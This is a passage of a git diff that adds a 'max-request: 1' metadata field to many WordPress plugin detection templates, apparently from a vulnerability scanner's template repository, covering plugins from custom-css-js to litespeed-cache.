a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 58d5c881d0..3d0073b5a5 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 840c086fb9..575c9ebe67 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml 